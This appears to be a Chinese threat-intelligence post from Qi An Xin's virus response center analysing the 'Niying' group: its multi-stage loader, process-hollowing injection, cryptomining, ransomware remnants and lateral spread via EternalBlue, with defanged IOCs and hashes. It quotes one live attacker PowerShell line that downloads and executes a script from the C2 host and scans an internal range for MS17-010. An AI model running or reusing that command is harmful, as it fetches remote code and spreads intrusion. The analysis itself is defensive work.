概述

匿影为2019年3月披露的一个攻击团伙，该团伙擅长使用公共资源（图床、网盘等）存放其攻击载荷以降低被防火墙拦截的概率。近期奇安信病毒响应中心监测到该家族活跃趋势显著增加并发现其攻击链路再一次有了新的变化：

匿影从挖矿到勒索一路高歌猛进，目前高频动态变化载荷进行攻击，我们监测到的载荷变化如下：

相关家族持久项下载执行的载荷动态变化实现动态下发不同攻击的能力，我们分析发现该家族有如下特点：

1. 擅长利用破解程序、下载器、激活工具等进行传播

2. 利用永恒之蓝漏洞+弱口令爆破进行横向扩散

3. 每个失陷主机都被创建无文件持久项(计划任务/WMI)定时下载执行恶意载荷

该家族高度活跃，在内网扩散能力强。奇安信病毒响应中心在这里提醒：加强安全防范，使用官方正版程序避免激活工具或破解插件感染病毒，定期更换强口令，及时补丁加固。

最新载荷分析

执行过程分为以下几个阶段：

1. 持久项执行阶段

黑客通过漏洞执行下载执行以下powershell脚本：

依次从c2下载多个文件到Programdata路径下，然后启动cp.exe,将Run.txt作为参数传入。

2. 注入进程阶段

Cp.exe是一个loader，会加载Run.txt，并将其的内容作为shellcode运行。

Shellcode如下：

在shellcode中会读取Programdata路径下的abc.jpg,将其中的shellcode解密注入多个系统进程运行。

注入的系统进程如下：

以挂起形式创建系统进程后，卸载进程模块并将shellcode写入，设置进程上下文使eip指向shellcode入口，最后恢复线程。

3.二次注入

被注入系统进程的恶意文件同样是一个加载器，带有一个vmp壳，会创建svchost.exe等进程，并使用和上一步相同的手段注入执行。

卸载进程原本的模块后，将解密出的恶意pe文件写入，设置进程上下文使其执行：

注入的文件带有vmp壳，字符串中带有勒索相关的信息及公钥，同时会将一个挖矿病毒注入notepad.exe。

运行时会在C:UsersPublic创建勒索信，内容如下，从该勒索信来看应该与 blackcat勒索软件相关

看相关信息，会加密类型如下(列表很长)：

特别注意的是：调试及真实执行并无勒索逻辑，经过分析确认相关abc.jpg 下载回来的载荷一直在变化(变化频率高)，隔一些时间分析载荷对应勒索信也发生了变化(如下图)：

所以我们猜测勒索模块攻击者有意预留，该团伙利用精准控制的 abc.jpg 载荷进而执行对应的功能：勒索、横向、挖矿。下图是间隔两天的abc.jpg 解密出来的载荷对比，大部分逻辑能对上:

继续分析，注入的挖矿病毒如下，回连矿池。

第一次注入的进程还会回连c2下载google.jpg，加载注入另一系统进程，这是匿影的横向扩散模块，会从c2下载永恒之蓝系列漏洞利用工具和其他远程执行工具，进行横向扩散：

注入的进程会执行以下powershell命令：

powershell”IEX(New-ObjectNet.WebClient).DownloadString(‘http://cdn.comenbove.com/Ladon66.jpg’); Ladon 192.168.14.1/16 MS17010

以下为从c2下载的黑客工具

产品防护能力：

      目前，奇安信全线产品均可对此病毒及其相似变种进行查杀。

总结

该家族动作隐蔽，在内网扩散能力强。奇安信病毒响应中心在这里提醒：加强安全防范，使用官方正版程序避免激活工具或破解插件感染病毒，定期更换强口令，及时补丁加固。

IOCs:

http[:]//cdn[.]comenbove[.]com/smb[.]jpg

http[:]//cdn[.]comenbove[.]com/smbdown/Run[.]txt

http[:]//cdn[.]comenbove[.]com/smbdown/cp[.]txt

http[:]//cdn[.]comenbove[.]com/smbdown/abc[.]jpg

http[:]//cdn[.]comenbove[.]com/Ladon66[.]jpg

http[:]//cdn[.]comenbove[.]com/google[.]jpg

34f48d709a7a7cc279da03377764d431

44921906b7db560b1fcfc08bce4c21be

4e2de9016fa75cd316bdabc06066cbbd

76686ea03db18f34cb9aa77b258a356e

7ca63a0efa8b6a202f2cbfbba35e495f

a30f7714a312ed28bfa1cf76461ac0e6

a7f2340c5eef97938f660fd6868b9dcb

af98a4a7d43f5b6deb670162bc4827b3

da8439e2ad085f320429f1caf3d1d1e5

ea406ad62f113fa5f959f58e96c51a4b

附录: 奇安信病毒响应中心

奇安信病毒响应中心是北京奇安信科技有限公司（奇安信集团）旗下的病毒鉴定及响应专业团队，背靠奇安信核心云平台，拥有每日千万级样本检测及处置能力、每日亿级安全数据关联分析能力。结合多年反病毒核心安全技术、运营经验，基于集团自主研发的QOWL和QDE（人工智能）引擎，形成跨平台木马病毒、漏洞的查杀与修复能力，并且具有强大的大数据分析以及实现全平台安全和防护预警能力。

奇安信病毒响应中心负责支撑奇安信全线安全产品的病毒检测，积极响应客户侧的安全反馈问题，可第一时间为客户排除疑难杂症。中心曾多次处置重大病毒事件、参与重大活动安全保障工作，受到客户的高度认可，提升了奇安信在业内的品牌影响力。

原文始发于微信公众号（奇安信病毒响应中心）：匿影恶梦